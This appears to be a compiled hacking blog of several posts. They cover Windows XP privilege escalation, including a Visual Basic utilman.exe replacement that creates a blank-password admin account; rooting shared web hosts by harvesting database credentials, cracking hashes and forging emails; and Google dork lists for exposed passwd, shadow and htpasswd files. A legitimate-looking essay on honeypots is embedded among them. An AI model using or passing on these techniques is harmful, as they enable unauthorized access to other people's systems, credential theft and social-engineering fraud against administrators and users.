Method 1:-

- Open Notepad -> type "net localgroup Administrator yourusername/add" (without the quotes)
- Make the admin login to the computer -> make him to run the file -> Congrats you are admin

Method No. 2

- Login to your XP box as a non-priviliged user.
- Open up a command window (run cmd.exe)
- In that command window, have the system schedule launch another command window.
- type at 20:00 /intereactive "cmd.exe" -> in the command prompt -> it will launch a interactive cmd with system priviliages at 20:00 -> set the time just ahead of your clock
- When new window opens, kill explorer.exe in task manager.
- open explorer.exe
- Congrats, you're now running as the system user - you have more power than 'Administrator'!
- Now you can make yourself administrator by adding your name to Administrators group
- Type this in command prompt -> net localgroup Administrator /add

Method 3:-

- Boot in the Safe mode in XP
- Most of the times people have no password for the real Administrator account , they usually give admin privilages to another account
- Get in the administrator account

Method 4:-

- Boot from live CD of a linux/unix distro
-

Other methods

Exploits :- like

http://www.milw0rm.com/exploits/556 - jpeg of death
http://insecure.org/sploits/NT.get-admin.kernal.hole.html
http://www.milw0rm.com/exploits/475 - jpeg exploit

Registry Changes :-

1. Run Registry Editor (Regedt32.exe).

2. Perform the following steps on each of the registry keys
identified above:

A. On the Security menu, click Permissions.

B. Click "Replace Permissions on Existing Subkeys" so that it
is

selected.

C. Click Everyone, change the Type Of Access to Read, and then
click OK.

3. Exit Registry Editor.

from :- http://insecure.org/sploits/NT.startup_programs.bad_registry_perms.html

Resetting the admin password :-
With Boot Disk

following link can be useful -> http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html

With Windows XP Boot CD

1. Place in windows XP CD and start your computer (it?s assumed here that your XP CD is bootable ? as it should be - and that you have your bios set to boot from CD)

2. Keep your eye on the screen messages for booting to your cd usually it will be ?Press any key to boot from cd?

3. Begin windows Repair process.

4. During the reboot, do not make the mistake of ?pressing any key? to boot from the CD again!

5. Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.

From here you can run any windows command and you?ll have full administrator access. To reset password you can use ether of two ways:



1) Run NUSRMGR.CPL to get graphical interface

2) Run Compmgmt.msc to get Computer Management console. From there use Local User and Groups->Users

another method :-
Run Apps with admin privilages

try runnigh your code with Administrator privilages with command "runas"

eg :- runas /env /user:Administrator "c:WINDOWSNOTEPAD.EXE"

it will run notepad in Administrator privilages , similarly run your code in admin privilages

1 .use sudowin. This is an open source project distributed under the BSD License (which is a very permissive license ? an example about how permissive it is is the fact that for a long time parts of the Windows network stack were taken from an externally developed source code licensed under this license) written in .NET 2.0. What it does is that it gives administrative credentials to the programs you want to, but they will still run with your profile (meaning that they will see the same registry, the same desktop / my documents directory and so on). An other important differnce is that you must enter your password to elevate privileges. It also contains both a GUI and a command line component. To install it, take the following steps:
go to the website and download it (in a rather confusing move the download link is where it displays the version number, towards the upper middle of the page, currently it says 0.1.1-r95). If you didn't download anything from sourceforge.net until now, it will ask you to select a mirror.

2 .You'll need the .NET framework 2.0. You can download it from the microsoft site if you don't already have it (be sure to download the redistributable package not the software development kit). Here is a direct link if you are running a 32 bit Intel or AMD machine. If you already have the .NET framework 1.0 or 1.1, it will prompt you during the installation and offer you the possibility to download and install the 2.0 version without interrupting the installation.

3 . Install the software. Remember to do this from an account with administrative privileges (you can use the methods described earlier to run the installation with enough privileges).

4. Using a notepad with administrative privileges edit the sudoers.xml file located in the Server subdirectory of the install directory (this is Crogram Filessudowin by default or Crogram Files (x86)sudowin on 64 bit systems). Go to the users section and add the users you want to have sudo capabilities (remember to enter the names in the format of . If you are a home user, you can find out your complete name by entering whoami at the command prompt). Now go towards the end and enter the commands which you want to be able to run with elevated privileges. Also look around the file and change other settings to fir your need. Save the file.

5. Use the command runas /user:Administrator "cmd /c start lusrmgr.msc" (assuming that Administrator is a user with administrative privileges to which you know the password) to display the user management console (anyone else finds the name funny?). Go to each user you want to be able to perform sudo and add them to the Sudoers group which was created by sudowin during the installation (you can do this by right clicking on them, clicking properties, going to the "Member of" tab, clicking Add, writing Sudoers and clicking Ok).

6. Use the command runas /user:Administrator "cmd /c start services.msc", find the sudowin service and restart it.

Haven't tested it myself taken from :- http://hype-free.blogspot.com/2006/09/non-hacking-tutorial-on-elevating.html

One more Method:-

OK Here it is, Please post some input on what you think. Also im trying to figure out a better way to gain Access to the NTFS partition. Any input welcomed!

Gain SYSTEM/Administrative Access to Windows XP/2000

I will explain how to gain Local Administrative rights to Windows XP/2000 computer without removing or cracking a Users password. In order for this

to work the Computer must have a CD-ROM drive, or other bootable device other then a harddrive.

(Im stoned and its 3:15a.m. so i hope this makes sense)
Overview:
Windows XP/2000 allows you to run a program with System level privileges before logging on. The name of the program is Utility Manager. It is

located at C:Windowssystem32utilman.exe for windows XP and C:WINNTSystem32utilman.exe for windows 2000. So all you have to do is make

your own program that creates an administrative account. The program that you create has to have a filename of Utilman.exe in order to work.

If the filesystem on the computer is FAT32 then this process is very simple and only takes a second. If the Computer uses the NTFS filesystem this

will take a few minutes depending on how fast the PC is.


First We need to make the program
I used Visual Basic 6, here is my source code that i used to create the administrative account:


#################################START###############################
Private Sub Form_Load()
Shell "net user NewAdmin " & """""" & " /add", vbHide
Pause (1)
Shell "net localgroup administrators NewAdmin /add", vbHide
Pause (1)
msgbox "Added Administrative User",16,"Hacked XP"
End
End Sub

Sub Pause(interval)
'Pauses execution
Current = Timer
Do While Timer - Current < Val(interval) DoEvents Loop End Sub '#################################END############################### Compile this with the filename of Utilman.exe this is very important! What this program does is create a User named NewAdmin with a blank password and then adds them to the Administrators Group. Ok Now that we've made the program lets move on... FAT32 1. Create a bootable floppy :: http://1gighost.net/keywest/boot98sc.exe
2. Add the newly made Utilman.exe to the Floppy
3. Restart the computer with the floppy in it
4. After DOS loads type C: and press enter.
5. If it changes from A:/> to C:/> then your doing good
6. use this command: Copy A:utilman.exe C:windowssystem32utilman.exe press Y to overwrite the exsisting file
7. Restart the computer without the floppy in it
8. When it gets to the Login Screen Press the Windows Key + U
9. Restart the computer if FastUser Switching is enabled (The Graphical Login with the picture next to the login name, XP Only) if not enabled skip to Step 10

9a. After restarting you should see a new user in the list named NewAdmin, click on this account and you just gained Administrative access to your

PC.
10. After pressing Windows Key + U then type in the username NewAdmin and push Enter. Thats It you now have administrative access to

your PC.


NTFS
Use a Windows 2000 Setup CD to gain access to the NTFS partition through the recovery console. From the recovery console you can copy over the hacked Utilman.exe. Once in the recovery console follow the same instructions as above from step 6. After copying over the file restart your computer by typing exit or pusing ALT CTRL DEL. Remove the Windows 2000 CD. When windows loads to the choose user screen simply push Windows Key + U. After pushing the Windows Key + U you should see a message that says "Added Administrative User", restart the computer one last time then choose the NewAdmin user account. This will have Administrative Privileges. It works ive done it and i hope you all enjoy this nice little hack ! ! ! (If your trying to gain SYSTEM level access your can replace the UTILMAN.exe to open a Command Prompt)

LOL i hope that made sense

Read more >>

Honeypots
Definitions and Value of Honeypots



Honeypots are an exciting new technology with enormous potential for the security community. The concepts were first introduced by several icons in computer security, specifically Cliff Stoll in the book The Cuckoo's Egg", and Bill Cheswick's paper " An Evening with Berferd." Since then, honeypots have continued to evolve, developing into the powerful security tools they are today. The purpose of this paper is to explain exactly what honeypots are, their advantages and disadvatages, and their value to the security.

Definitions
The first step to understanding honeypots is defining what a honeypot is. This can be harder then it sounds. Unlike firewalls or Intrusion Detection Systems, honeypots do not solve a specific problem. Instead, they are a highly flexible tool that comes in many shapes and sizes. They can do everything from detecting encrypted attacks in IPv6 networks to capturing the latest in on-line credit card fraud. Its is this flexibility that gives honeypots their true power. It is also this flexibility that can make them challenging to define and understand. As such, I use the following definition to define what a honeypot is.

A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource.


This is a general defintion covering all the different manifistations of honeypots. We will be discussing in this paper different examples of honeypots and their value to security. All will fall under the definition we use above, their value lies in the bad guys interacting with them. Conceptually almost all honeypots work they same. They are a resource that has no authorized activity, they do not have any production value. Theoreticlly, a honeypot should see no traffic because it has no legitimate activity. This means any interaction with a honeypot is most likely unauthorized or malicious activity. Any connection attempts to a honeypot are most likely a probe, attack, or compromise. While this concept sounds very simple (and it is), it is this very simplicity that give honeypots their tremendous advantages (and disadvantages). I highlight these below.

Advantages: Honeypots are a tremendously simply concept, which gives them some very powerful strengths.


* Small data sets of high value: Honeypots collect small amounts of information. Instead of logging a one GB of data a day, they can log only one MB of data a day. Instead of generating 10,000 alerts a day, they can generate only 10 alerts a day. Remember, honeypots only capture bad activity, any interaction with a honeypot is most likely unauthorized or malicious activity. As such, honeypots reduce 'noise' by collectin only small data sets, but information of high value, as it is only the bad guys. This means its much easier (and cheaper) to analyze the data a honeypot collects and derive value from it.

* New tools and tactics: Honeypots are designed to capture anything thrown at them, including tools or tactics never seen before.

* Minimal resources: Honeypots require minimal resources, they only capture bad activity. This means an old Pentium computer with 128MB of RAM can easily handle an entire class B network sitting off an OC-12 network.

* Encryption or IPv6: Unlike most security technologies (such as IDS systems) honeypots work fine in encrypted or IPv6 environments. It does not matter what the bad guys throw at a honeypot, the honeypot will detect and capture it.

* Information: Honeypots can collect in-depth information that few, if any other technologies can match.

* Simplicty: Finally, honeypots are conceptually very simple. There are no fancy algorithms to develop, state tables to maintain, or signatures to update. The simpler a technology, the less likely there will be mistakes or misconfigurations.



Disadvantages: Like any technology, honeypots also have their weaknesses. It is because of this they do not replace any current technology, but work with existing technologies.

# Limited view: Honeypots can only track and capture activity that directly interacts with them. Honeypots will not capture attacks against other systems, unless the attacker or threat interacts with the honeypots also.

# Risk: All security technologies have risk. Firewalls have risk of being penetrated, encryption has the risk of being broken, IDS sensors have the risk of failing to detect attacks. Honeypots are no different, they have risk also. Specifically, honeypots have the risk of being taken over by the bad guy and being used to harm other systems. This risk various for different honeypots. Depending on the type of honeypot, it can have no more risk then an IDS sensor, while some honeypots have a great deal of risk. We identify which honeypots have what levels of risk later in the paper.


It is how you leverage these advantages and disadvantages that defines the value of your honeypot (which we discuss later).

Types of Honeypots
Honeypots come in many shapes and sizes, making them difficult to get a grasp of. To help us better understand honeypots and all the different types, we break them down into two general categories, low-interaction and high-interaction honeypots. These categories helps us understand what type of honeypot you are dealing with, its strengths, and weaknesses. Interaction defines the level of activity a honeypot allows an attacker. Low-interaction honeypots have limited interaction, they normally work by emulating services and operating systems. Attacker activity is limited to the level of emulation by the honeypot. For example, an emulated FTP service listening on port 21 may just emulate a FTP login, or it may support a variety of additional FTP commands. The advantages of a low-interaction honeypot is their simplicity. These honeypots tend to be easier to deploy and maintain, with minimal risk. Usually they involve installing software, selecting the operating systems and services you want to emulate and monitor, and letting the honeypot go from there. This plug and play approach makes deploying them very easy for most organizations. Also, the emulated services mitigate risk by containing the attacker's activity, the attacker never has access to an operating system to attack or harm others. The main disadvantages with low interaction honeypots is that they log only limited information and are designed to capture known activity. The emulated services can only do so much. Also, its easier for an attacker to detect a low-interaction honeypot, no matter how good the emulation is, skilled attacker can eventually detect their presence. Examples of low-interaction honeypots include Specter, Honeyd, and KFSensor.

High-interaction honeypots are different, they are usually complex solutions as they involve real operating systems and applications. Nothing is emulated, we give attackers the real thing. If you want a Linux honeypot running an FTP server, you build a real Linux system running a real FTP server. The advantages with such a solution are two fold. First, you can capture extensive amounts of information. By giving attackers real systems to interact with, you can learn the full extent of their behavior, everything from new rootkits to international IRC sessions. The second advantage is high-interaction honeypots make no assumptions on how an attacker will behave. Instead, they provide an open environment that captures all activity. This allows high-interaction solutions to learn behavior we would not expect. An excellent example of this is how a Honeynet captured encoded back door commands on a non-standard IP protocol (specifically IP protocol 11, Network Voice Protocol). However, this also increases the risk of the honeypot as attackers can use these real operating system to attack non-honeypot systems. As result, additional technologies have to be implement that prevent the attacker from harming other non-honeypot systems. In general, high-interaction honeypots can do everything low-interaction honeypots can do and much more. However, they can be more complext to deploy and maintain. Examples of high-interaction honeypots include Symantec Decoy Server and Honeynets. You can find a complete listing of both low and high interaction honeypots at Honeypot Solutions page. To better understand both low and high interaction honeypots lets look at two examples. We will start with the low-interaction honeypot Honeyd.

Honeyd: Low-interaction honeypot
Honeyd is a low-interaction honeypot. Developed by Niels Provos, Honeyd is OpenSource and designed to run primarily on Unix systems (though it has been ported to Windows). Honeyd works on the concept of monitoring unused IP space. Anytime it sees a connection attempt to an unused IP, it intercepts the connection and then interacts with the attacker, pretending to be the victim. By default, Honeyd detects and logs any connection to any UDP or TCP port. In addition, you can configure emulated services to monitor specific ports, such as an emulated FTP server monitoring TCP port 21. When an attacker connects to the emulated service, not only does the honeypot detect and log the activity, but it captures all of the attacker's interaction with the emulated service. In the case of the emulated FTP server, we can potentially capture the attacker's login and password, the commands they issue, and perhaps even learn what they are looking for or their identity. It all depends on the level of emulation by the honeypot. Most emulated services work the same way. They expect a specific type of behavior, and then are programmed to react in a predetermined way. If attack A does this, then react this way. If attack B does this, then respond this way. The limitation is if the attacker does something that the emulation does not expect, then it does not know how to respond. Most low-interaction honeypots, including Honeyd, simply generate an error message. You can see what commands the emulated FTP server for Honeyd supports by review the source code.

Some honeypots, such as Honeyd, can not only emulate services, but emulate actual operating systems. In other words, Honeyd can appear to the attacker to be a Cisco router, WinXP webserver, or Linux DNS server. There are several advantages to emulating different operating systems. First, the honeypot can better blend in with existing networks if the honeypot has the same appearance and behavior of production systems. Second, you can target specific attackers by providing systems and services they often target, or systems and services you want to learn about. There are two elements to emulating operating systems. The first is with the emulated services. When an attacker connects to an emulated service, you can have that service behave like and appear to be a specific OS. For example, if you have a service emulating a webserver, and you want your honeypot to appear to be a Win2000 server, then you would emulate the behavior of a IIS webserver. For Linux, you would emulate the behavior of an Apache webserver. Most honeypots emulate OS' in this manner. Some sophisticated honeypots take this emulation one step farther (as Honeyd does). Not only do they emulate at the service level, but at the IP stack level. If someone uses active fingerprinting measures to determine the OS type of your honeypot most honeypots respond with the IP stack of whatever OS the honeypot is installed on. Honeyd spoof the replies, making not only the emulated services, but emulated IP stacks behave as the operating systems would. The level of emulation and sophistication depends on what honeypot technology you chose to use.

Honeynets: High-interaction honeypot
Honeynets are a prime example of high-interaction honeypot. Honeynets are not a product, they are not a software solution that you install on a computer. Instead, Honeyents are an architecture, an entire network of computers designed to attacked. The idea is to have an architecture that creates a highly controlled network, one where all activity is controlled and captured. Within this network we place our intended victims, real computers running real applications. The bad guys find, attack, and break into these systems on their own initiative. When they do, they do not realize they are within a Honeynet. All of their activity, from encrypted SSH sessions to emails and files uploads, are captured without them knowing it. This is done by inserting kernel modules on the victim systems that capture all of the attacker's actions. At the same time, the Honeynet controls the attacker's activity. Honeynets do this using a Honeywall gateway. This gateway allows inbound traffic to the victim systems, but controls the outbound traffic using intrusion prevention technologies. This gives the attacker the flexibility to interact with the victim systems, but prevents the attacker from harming other non-Honeynet computers. An example of such a deployment can be seen in Figure 1.

Value of Honeypots
Now that we have understanding of two general categories of honepyots, we can focus on their value. Specifically, how we can use honeypots. Once again, we have two general categories, honeypots can be used for production purposes or research. When used for production purposes, honeypots are protecting an organization. This would include preventing, detecting, or helping organizations respond to an attack. When used for research purposes, honeypots are being used to collect information. This information has different value to different organizations. Some may want to be studying trends in attacker activity, while others are interested in early warning and prediction, or law enforcement. In general, low-interaction honeypots are often used for production purposes, while high-interaction honeypots are used for research purposes. However, either type of honeypot can be used for either purpose. When used for production purposes, honeypots can protect organizations in one of three ways; prevention, detection, and response. We will take a more in-depth look at how a honeypot can work in all three.

Honeypots can help prevent attacks in several ways. The first is against automated attacks, such as worms or auto-rooters. These attacks are based on tools that randomly scan entire networks looking for vulnerable systems. If vulnerable systems are found, these automated tools will then attack and take over the system (with worms self-replicating, copying themselves to the victim). One way that honeypots can help defend against such attacks is slowing their scanning down, potentially even stopping them. Called sticky honeypots, these solutions monitor unused IP space. When probed by such scanning activity, these honeypots interact with and slow the attacker down. They do this using a variety of TCP tricks, such as a Windows size of zero, putting the attacker into a holding pattern. This is excellent for slowing down or preventing the spread of a worm that has penetrated your internal organization. One such example of a sticky honeypot is LaBrea Tarpit. Sticky honeypots are most often low-interaction solutions (you can almost call them 'no-interaction solutions', as they slow the attacker down to a crawl . Honeypots can also be protect your organization from human attackers. The concept is deception or deterrence. The idea is to confuse an attacker, to make him waste his time and resources interacting with honeypots. Meanwhile, your organization has detected the attacker's activity and have the time to respond and stop the attacker. This can be even taken one step farther. If an attacker knows your organization is using honeypots, but does not know which systems are honeypots and which systems are legitimate computers, they may be concerned about being caught by honeypots and decided not to attack your organizations. Thus the honeypot deters the attacker. An example of a honeypot designed to do this is Deception Toolkit, a low-interaction honeypot.

The second way honeypots can help protect an organization is through detection. Detection is critical, its purpose is to identify a failure or breakdown in prevention. Regardless of how secure an organization is, there will always be failures, if for no other reasons then humans are involved in the process. By detecting an attacker, you can quickly react to them, stopping or mitigating the damage they do. Tradtionally, detection has proven extremely difficult to do. Technologies such as IDS sensors and systems logs haven proven ineffective for several reasons. They generate far too much data, large percentage of false positives, inability to detect new attacks, and the inability to work in encrypted or IPv6 environments. Honeypots excel at detection, addressing many of these problems of traditional detection. Honeypots reduce false positives by capturing small data sets of high value, capture unknown attacks such as new exploits or polymorphic shellcode, and work in encrypted and IPv6 environments. You can learn more about this in the paper Honeypots: Simple, Cost Effective Detection. In general, low-interaction honeypots make the best solutions for detection. They are easier to deploy and maintain then high-interaction honeypots and have reduced risk.

The third and final way a honeypot can help protect an organization is in reponse. Once an organization has detected a failure, how do they respond? This can often be one of the greatest challenges an organization faces. There is often little information on who the attacker is, how they got in, or how much damage they have done. In these situations detailed information on the attacker's activity are critical. There are two problems compounding incidence response. First, often the very systems compromised cannot be taken offline to analyze. Production systems, such as an organization's mail server, are so critical that even though its been hacked, security professionals may not be able to take the system down and do a proper forensic analysis. Instead, they are limited to analyze the live system while still providing production services. This cripiles the ability to analyze what happend, how much damage the attacker has done, and even if the attacker has broken into other systems. The other problem is even if the system is pulled offline, there is so much data pollution it can be very difficult to determine what the bad guy did. By data pollution, I mean there has been so much activity (user's logging in, mail accounts read, files written to databases, etc) it can be difficult to determine what is normal day-to-day activity, and what is the attacker. Honeypots can help address both problems. Honeypots make an excellent incident resonse tool, as they can quickly and easily be taken offline for a full forensic analysis, without impacting day-to-day business operations. Also, the only activity a honeypot captures is unauthorized or malicious activity. This makes hacked honeypots much easier to analyze then hacked production systems, as any data you retrieve from a honeypot is most likely related to the attacker. The value honeypots provide here is quickly giving organizations the in-depth information they need to rapidly and effectively respond to an incident. In general, high-interaction honeypots make the best solution for response. To respond to an intruder, you need in-depth knowledge on what they did, how they broke in, and the tools they used. For that type of data you most likely need the capabilities of a high-interaction honeypot.

Up to this point we have been talking about how honeypots can be used to protect an organization. We will now talk about a different use for honeypots, research. Honeypots are extremely powerful, not only can they be used to protect your organization, but they can be used to gain extensive information on threats, information few other technologies are capable of gathering. One of the greatest problems security professionals face is a lack of information or intelligence on cyber threats. How can we defend against an enemy when we don't even know who that enemy is? For centuries military organizations have depended on information to better understand who their enemy is and how to defend against them. Why should information security be any different? Research honeypots address this by collecting information on threats. This information can then be used for a variety of purposes, including trend analysis, identifying new tools or methods, identifying attackers and their communities, early warning and prediction, or motivations. One of the most well known examples of using honeypots for research is the work done by the Honeynet Project, an all volunteer, non-profit security research organization. All of the data they collect is with Honeynet distributed around the world. As threats are constantly changing, this information is proving more and more critical.

Getting Started
If you have never worked with honeypots before and want to learn more, I recommend starting with simple low-interaction honeypots, such as KFSensor or Specter for Window users, or Honeyd for Unix users. There is even a Honeyd Linux Toolkit for easy deployment of Honeyd on Linux computers. Low-interaction honeypots have the advantage of being easier to deploy and little risk, as they contain the activity of the attacker. Once you have had an opportunity to work with low-interaction solutions, you can take the skills and understanding you have developed and work with high-interaction solutions. To help you better understand honeypots, below is a chart summarizing what we just covered.

Low-interaction
Solution emulates operating systems and services.


* Easy to install and deploy. Usually requires simply installing and configuring software on a computer.

* Minimal risk, as the emulated services control what attackers can and cannot do.

* Captures limited amounts of information, mainly transactional data and some limited interaction.



High-interaction
No emulation, real operating systems and services are provided.


* Can capture far more information, including new tools, communications, or attacker keystrokes.

* Can be complex to install or deploy (commercial versions tend to be much simpler).

* Increased risk, as attackers are provided real operating systems to interact with.


Finally, no paper on honeypots would be complete without a discussion about legal issues. There are many misconcepts about the legal issues of honeypots. Instead of briefly covering the legal issues in this paper, I will be releasing a new paper at the end of May, 2003 dedicated to the legal issues of honeypot technologies.

Conclusion
The purpose of this paper was to define the what honeypots are and their value to the security community. We identified two different types of honeypots, low-interaction and high-interaction honeypots. Interaction defines how much activity a honeypot allows an attacker. The value of these solutions is both for production or research purposes. Honeypots can be used for production purposes by preventing, detecting, or responding to attacks. Honeypots can also be used for research, gathering information on threats so we can better understand and defend against them. If you are interested in learning more about honeypots, you may want to consider the book Honeypots: Tracking Hackers, the first and only book dedicated to honeypot technologies


http://www.tracking-hackers.com
http://www.tracking-hackers.com/papers/honeypots.html

Read more >>

In This Video I Illustrate WinnerTweak Se Bug.Acess From Cli.Protected Folder With Password bypassed very easy:)
For Download
Click Here

Read more >>

The highest access you can gain on any *nix based operating system is
root. On this account you can do many things that you cant with any
other account! In this tutorial i will explain how to gain access to
this account by just using your eyes.

The biggest weakness in any system is the stupid bugger that is running
it. They are prone to write things down that they should not, use the
same password for everything and configure things wrong.
So keeping that in mind lets look around the server.

You are looking for things such as mysql connection scripts. These are named things like config.php , configure.php , db.php and db_connect.php. Look at these and they will usualy have the connection details to that users mysql account!

If this is a hosting company you are not really that interested
in the many users that only have minimal permissions over there own
sites you are interested in the webhosts site.

So execure the comand “cat /etc/passwd” (without the quotes) and then look for an entry with normally the first eight letters of the hosting company’s domain. then with your shell navigate to there directory. Then go to there site and
have a look around. There will most probably be an automatic account
creation script or controlpanel login script on there main site.

You will need to make note of the directory that the script is in and then
go back to your shell. Now navigate to the directory and look for files
that may contain details to the hosting database. If the server owner is
as stupid as they come this will be the connection details for root
mysql which means you have control over all databases on the server if
not you can just connect to the the accounts database.

If the server owner is stupid the passwords will be stored in plain text. This means
that you have access to all accounts on the server! Now on with the
rooting, we need to find the admin’s password if it is stored in the
database with the accounts in that is us done just login through the
control panel and you got root cp on the server.

There are different approaches if the host is not setup like this! Most
hosts have support forums these days and all main
stream forums software saves the database password in plain text so we
can be sure we will be able to connect to that. If they are using phpbb
which many are hashes are unsalted which means you can use any regular
md5 cracker to gain the plain text of the hash.

Now download putty if you are on windows or if you are in linux use ssh -l root and try the password that he uses on the forums. If you can’t crack it or it is not he same next we have to look arround again. Most hosts like to backup
there stuff so that if things go wrong they can restore what they have.
Well to do this scripts need passwords so look for mysql and ftp backup
scripts and test the passwords they contain.

If all this fails you have one last ace in your hand. Social enjiering! This can be done many ways and I am not going to explain it now but all im going to say is that in your travels arrount his server you should have gained alot of
information about him so try out different things such as emailing other
members of the team from a fake mailer saying that he is going away and
and needs the password to his account on the control panel sent to his
private email address and so on.

I would tell you about local root exploitation but then that would not be using
your eyes would it!

If all this fails go look for another server!

Read more >>

Before we begin, I strongly recommend reading through http://www-db.stanford.edu/~backrub/google.html
#This article will help you understand the inner workings of a search engine (if you're not already ereet)
#I added a copy of this article to the end of this text, so just scroll down a little ways :)


What is this tutorial about?

-It's about using google to get the information you need, fast

Why should I read it?

-Because at the end of this tutorial, you'll be able to use google to find WHATEVER you need!

Why are you writing it?

-Because all of the ereet programmers at irc.smart-dev.com/irc.zoite.net are tired of people asking us questions,
when they could just ask lord google

Do I need to gather any tools for this tutorial?

-A web browser (i.e. lynx, mozilla), and confidence in the fact that you aren't inept



Now the 'tutorial'

Google is the shit. You can find virtually ANYTHING you want with it. "©2003 Google - Searching 3,083,324,652 web
pages" as of Sunday, February 16, 2003! I use google for pretty much anything. Any question you have can be answered
90% of the time in the first 20 results, if you search properly. In the next few sections I will be going over some
basic/advanced/UBER COOL techniques for searching.


I.Getting started

-Open your web browser, and goto www.google.com (if it isn't your homepage, which it should be!)
-Now, click on preferences- Most of this should be fine preset, but make sure you fill in the "do not filter my
search results," and select 100 results per page from the drop down menu, then fill in the last bubble (if thats
your thing). Click save preferences (note: they will only be saved if you have cookies enabled).

-Now that you have everything set up, let's see everything google has to offer (because google has a slew of useful
tools). First theres the web search, which is the topic of this article. After that theres the image search, which
is pretty useful if you want to find a picture of someone you know (I will go into detail later on), or if you just
wannt to find some free porn! Sicko. Next up: Groups. I LOVE this feature! You can search year, and years, and years,
of posts on USENET discussion boards. I have gotten SO much valuable information (mostly stuff to help me crack my
target) just by using this feature. I will also go indepth on this feature as well. Next to last: Directory searching.
This is pretty useful if you want to find information on a TOPIC. For instance if you wanted to do a biology project
on genetic disorders you would use this. Last up: News. This is a fairly new feature, added a few months ago. It
tells you how recent articles are (by the hour, pretty cool!). You can look at world news on World, U.S., buisness,
Science/Tech, Sports, Entertainment, and Health.

II.Google for Web searches
(BASIC)
-Well, you've got a broad sense of what google does, so lets get right into the specifics! I can hardly wait!

A. Deciding on keywords
-Try specific keywords first (i.e. search for elephant as opposed to animals)
-Make searches as specific as you can.
-Keep searches as specific as you can!
+Note: The more specific you want your search to be, the more words you need, and you'll get less results
(this can be a bad or good thing)

B. How it works
-When you search for hacker tutorials, google interprets it as hacker AND tutorials, so it returns only pages
with all of the keywords you entered by default
-When you search for tutorials for hackers, the word for is omitted, as are all other words like if, a, who,
what, when, where, and how. If you need to include a common word in your search phrase use a '+' before the
common word. Your search is now tutorials +for hackers.
+note: google is not case sensitive
+note: google does not use wildcards (searching for googl* will not return google)
(ADVANCED)

A. ""'s
-Using quotations is probably the most important part of an advanced search. You can really control the
results of your search using quotes. When you use quotes, all of your results will contain the exact phrase.
So if you were to search "Tutorial for hacking" Google would search 3,083,324,652 web sites for that exact
phrase.
-You can put part of your search in quotes, and the other a regular search. For instance, if I wanted to find
out what pages my friend that just happens to be a girl is on the internet, I would search "Firstname
Lastname" Thomas Dale. This would search for the exact phrase "her name" and then it would search for any
pages that contained the words Thomas Dale(Thomas Dale is my highschool).

+Find me! My name is alejandro(alex), and i'm part of the smart-dev community ;)
B. "-"'s

-Using '-' to omit results. Perhaps you're searching for a new type of password file, for a new webserver.
The password file is called passwerd.db, but when you do a simple in title search(just keep reading, you'll
understand later) all you get is a bunch of results that turn out to be a config file that has syntax
referring to passwerd.db. Lets say this config file is named config(go figure). Omit this from your search
simply by searching searchstring -config and viola you get a list of sites that display passwerd.db to the
public! You can also use the boolean term NOT.
(HACKING/CRACKING)

Yay! This is why I wrote this article!

INTRO TO HACKING/CRACKIGN WITH GOOGLE
-Many of you probably already know this, but you can hack/crack with google. I use it in 100% of the
hacks/cracks I perform. You can use google to help you hack/crack in a few different ways. I will discuss
these in the sections below ("no shit!")

A. intitle:
-This is a built in function in google that searches for your phrase in the title of a web page. The
title of a webpage is in the upper left of your current window. (you should see google.txt if someone
hasnt changed the name). This is useful if you want to find something VERY specific.
-examples: intitle:"billing" intitle:"payments" intitle:"passwd"
B. Directory Indexing

-One GREAT trick is to find sites that allow directory indexing. This can be done by searching
intitle:"index of" phrase. Your mind should now be about to explode with the possibilities this could
hold. If it doesn't, that's ok, because if you look at the end of this article you'll see i've
provided you with an uber cool list! Here are some basic phrases you can use: intitle:"index of"
"passwd" OR "passwd.txt" OR "AutismIsSoCool!". This searches for files named passwd or if that isnt
found, searches for passwd.txt or if that isnt found searches for AutismIsCool! Think original, and
you can come up with the coolest stuff! I'm not just talking about passwords... I'm talking about
warez, passwords, and even credit card numbers!!! (although to be honest it's not easy ;))

C. allinurl:
-Guess what this does! Basically I use this when I want to find a piece of software. When i'm at school we
have some stupid web site filter, that doesn't allow me to download AIM (AOL instant messenger uhhh tm) so
basically I just do a search for allinurl:"aim.exe" and I get to take my pick! This can also be used for
passwd, passwd.txt, and so on

D. Cache
-Perhaps you have been searching for intitle:"index of" etc/shadow, and you see what looks like a valid
shadow file in your results list, but you cant access it, because you arent root, or whatever. Well thanks to
google cache, it may be possible for you to view this file. Just click the little chached link under the
result!
+note: this doesnt work 100% of the time

E. Collecting info on your target

-You can use google to find all sorts of juicy information about your target. For instance, if you wanted to
know what @target.com addresses were on the site, just search "@target.com" site:www.target.com. You should
get a nice list of email addresses. (these can double as usernames for other things besides emails)
-GOOGLE GROUPS is a great way to get info on a target. Just click the groups tab and search for @target.com,
and you will see everything anyone from your target has EVER posted on a usenet board! This is a real good
one!

THATS IT! THAT'S THE WHOLE TUTORIAL!

Summary: Well I hope you learned something from this article. Wether you were a complete noob, an advanced internet user,
or an ereet hacker, I tried to teach you all something. Remember- don't ever give up after only a few minutes of
searching... You'll get the right combination of keywords sooner or later. Just try to imagine what words you would use
for the item you are trying to find ;). Now GO! I officialy deem you "Google lord!"

(APPENDIX A)

-This is a list of all the cool searches I've found over the years
-PLEASE add to it! add your searches, and put the date you added it next to the search, then upload it somewhere

allinurl: winnt/system32/ (get cmd.exe)
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart **GOOD ONE!

-and hey! wouldnt you know it! someone has already taken care of the rest of this appendix for me! Thanks Johnny!

/*/*/*The following list was taken from johnny.ihackstuff.com*\*\*\
_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
